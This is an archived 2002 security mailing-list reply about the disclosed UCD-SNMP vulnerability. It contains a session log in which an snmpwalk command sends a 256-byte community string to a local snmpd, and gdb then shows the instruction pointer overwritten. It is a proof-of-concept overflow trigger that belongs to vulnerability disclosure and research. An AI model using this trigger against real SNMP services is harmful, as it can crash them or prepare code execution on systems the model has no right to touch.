Re: Exploiting SNMP?

From: H D Moore (slistat_private)
Date: Fri Feb 15 2002 - 11:16:51 PST

Next message: Jonathan.Carreraat_private: "RE: SNMP"

Previous message: Alla Bezroutchko: "Possible IDS-evasion technique"
In reply to: foobat_private: "Exploiting SNMP?"
Next in thread: Nash Leon: "Re: Exploiting SNMP?"
Reply: Nash Leon: "Re: Exploiting SNMP?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Thursday 14 February 2002 12:36 pm, foobat_private wrote:
> Has anyone tried exploiting the SNMP problems disclosed in the recent CERT
> notice, and original investigated by the University of Oulu?

The UCD-SNMP4.2.1 package is trivial to exploit. A community string of 
exactly 256 bytes will smash eip. All testing was done on Linux, with both 
the Red Hat 7.1 RPM and the source installs of 4.2.1. Every version prior to 
4.2.2 seems to be vulnerable to this (except some of the OBSD versions).

Here is a quick session log, showing eip being overwritten in ucd 4.0.1:

[root@penny /root]# snmpd -version
[root@penny /root]# snmpd
[root@penny /root]# ps ax | grep snmpd
20279 pts/0    S      0:00 snmpd
20283 pts/0    S      0:00 grep snmpd
[root@penny /root]# which snmpd
/usr/sbin/snmpd
[root@penny /root]# gdb /usr/sbin/snmpd
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...(no debugging symbols 
found)...
(gdb) attach 20279
Attaching to program: /usr/sbin/snmpd, Pid 20279
Reading symbols from /usr/lib/libsnmp.so.0...(no debugging symbols 
found)...done.
Reading symbols from /lib/libnsl.so.1...done.
Reading symbols from /usr/lib/librpm.so.0...done.
Reading symbols from /lib/libdb.so.2...done.
Reading symbols from /usr/lib/libz.so.1...done.
Reading symbols from /lib/libm.so.6...done.
Reading symbols from /lib/libc.so.6...c
done.
Reading symbols from /usr/lib/libbz2.so.0...done.
Reading symbols from /lib/ld-linux.so.2...done.
Reading symbols from /lib/libnss_files.so.2...done.
0x29b54e in __select () from /lib/libc.so.6
(gdb) c
Continuing.

In another terminal: 
[root@penny /root]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 256'`

Back to gdb:

Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()
(gdb)
UCD-snmp version:  4.0.1
Author:            Wes Hardaker
Email:             ucd-snmp-coders@ucd-snmp.ucdavis.edu

Next message: Jonathan.Carreraat_private: "RE: SNMP"
Previous message: Alla Bezroutchko: "Possible IDS-evasion technique"
In reply to: foobat_private: "Exploiting SNMP?"
Next in thread: Nash Leon: "Re: Exploiting SNMP?"
Reply: Nash Leon: "Re: Exploiting SNMP?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Feb 15 2002 - 18:13:28 PST